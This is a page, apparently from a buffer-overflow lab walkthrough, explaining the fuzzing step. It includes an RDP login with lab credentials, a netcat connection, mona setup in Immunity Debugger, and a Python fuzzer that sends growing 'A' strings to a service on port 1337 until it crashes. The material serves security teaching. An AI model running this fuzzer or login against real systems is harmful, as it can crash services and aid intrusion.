2. Fuzzing
Fuzzing
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.213.94
Once we find a vulnerable part with Spiking, we are going to use fuzzing. Fuzzing is to send a bunch of characters to the program to see if we can break it.
On your Kali box, connect to port 1337 on MACHINE_IP using netcat:
nc MACHINE_IP 1337
Mona Configuration
The mona script has been preinstalled, however to make it easier to work with, you should configure a working folder using the following command, which you can run in the command input box at the bottom of the Immunity Debugger window:
!mona config -set workingfolder c:\mona\%p
fuzzer.py
import socket, time, sys
ip = "MACHINE_IP"
port = 1337
timeout = 5
buffer = []
counter = 100
while len(buffer) < 30:
buffer.append("A" * counter)
counter += 100
for string in buffer:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
connect = s.connect((ip, port))
s.recv(1024)
print("Fuzzing with %s bytes" % len(string))
s.send("OVERFLOW1 " + string + "\r\n")
s.recv(1024)
s.close()
except:
print("Could not connect to " + ip + ":" + str(port))
sys.exit(0)
time.sleep(1)
Run the fuzzer . py script using python: python fuzzer.py
The fuzzer will send increasingly long strings comprised of As (up to 3000). If the fuzzer crashes the server with one of the strings, you should see an error like: "Could not connect to MACHINE_IP:1337". Make a note of the largest number of bytes that were sent.
Last updated
Was this helpful?